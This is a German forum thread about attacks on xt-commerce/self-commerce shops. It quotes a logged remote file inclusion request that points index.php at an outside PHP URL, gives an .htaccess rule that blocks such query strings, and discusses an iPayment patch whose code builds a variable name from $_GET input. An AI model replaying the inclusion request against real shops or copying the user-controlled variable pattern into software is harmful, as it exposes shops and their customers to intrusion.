Sicherheit! (Fehler in Zahlungsmodul iPayment)

      ......und es gibt da noch etwas:
      Seit neuestem wird mein Shop angegriffen, indem man versucht eine PHP-Datei auszuführen.
      Diese Datei ist hier zu finden:
      http://www.karazim.com/n?
      Ich vermute, daß damit ein Angriff auf andere Shopbesitzer oder Kunden gemacht werden soll.
      Es macht daher Sinn ins Root eine .htaccess mit u.a. folgendem Inhalt zu schreiben:
      RewriteEngine On

      RewriteCond %{QUERY_STRING} (.*)=http(.*)
      RewriteRule ^(.*) - [F]

      (Vorsicht, falls Ihr eine URL von/nach draußen included; das funktioniert dann nicht mehr.)
      Ebenso sollte man oft das PW für die MySQL ändern.

      Schaut Euch mal öfters "Who is online" an.
      Da findet man die Hacker:
      87.230.85.248 21:52:23 21:52:23 //shop/index.php?=http://www.karazim.com/n?
      Die Ip-Adressen sind wahrscheinlich gefaket.
      Würde mich interessieren, ob noch weitere XTCs angegriffen worden sind.
      Um im Nachhinein feststellen zu können, ob das Geschilderte passiert ist, kann man in den Logfiles des Servers nachsehen.
      An dieser Stelle noch ein Lob an meinen Provider ALL-INKL, der sich auch spät abends noch eingeschaltet hat und meine Verzeichnisse kontrolliert hat.
      Harry
      Eigentlich sollten bei self-commerce solche Attacken ins leere laufen, da die normal nur über das Suchfeld möglich sind. Und die Sicherheitslücken, die xtc dort aufweist, sind ja in self ausgeräumt. Dennoch danke für den Hinweis. Habe bereits öfters von solchen attacken auf xt-commerce systeme gehört. Im Hausforum wird darüber hin und wieder diskutiert.
      ::: shd-media.de : Downloads & Blog für self-commerce :::

      ::: self-commerce Modul-Entwicklung, Templates, Support :::
      Hi,
      danke für diesen Beitrag. Ich benutze Ipayment, aber leider ist es mir nicht möglich diese neuen Dateien einzubinden.

      Laut Patch soll man folgendes ändern

      Quellcode

      1. Öffnen Sie die Datei "checkout_confirmation.php" und ersetzen Sie in Zeile 76 die Zeile
      2. if ($_POST['conditions'] == false) {
      3. mit
      4. if ($_REQUEST['conditions'] == false) {
      5. Außerdem fügen Sie in der Zeile 202 nach "$smarty->assign('PAYMENT_METHOD'..." folgenden Block ein:
      6. if (isset($_GET['payment_error']) && is_object(${$_GET['payment_error']}) && ($error = ${$_GET['payment_error']}->get_error()))
      7. $smarty->assign('error', $error['title'].'
      8. '.htmlspecialchars($error['error']));


      Das was ich nicht finde ist die Zeile
      $smarty->assign('PAYMENT_METHOD'..
      in der Datei checkout_confirmation.php.

      Kann mir jemand sagen wie ich diesen Patch installieren kann?

      Gruß

      Serkan
      ist doch da. Bei self-commerce in Zeile 195 statt in Zeile 202

      Quellcode

      1. if ($order->info['payment_method'] != 'no_payment' && $order->info['payment_method'] != '') {
      2. include (DIR_WS_LANGUAGES.'/'.$_SESSION['language'].'/modules/payment/'.$order->info['payment_method'].'.php');
      3. $smarty->assign('PAYMENT_METHOD', constant(MODULE_PAYMENT_.strtoupper($order->info['payment_method'])._TEXT_TITLE));
      4. }
      ::: shd-media.de : Downloads & Blog für self-commerce :::

      ::: self-commerce Modul-Entwicklung, Templates, Support :::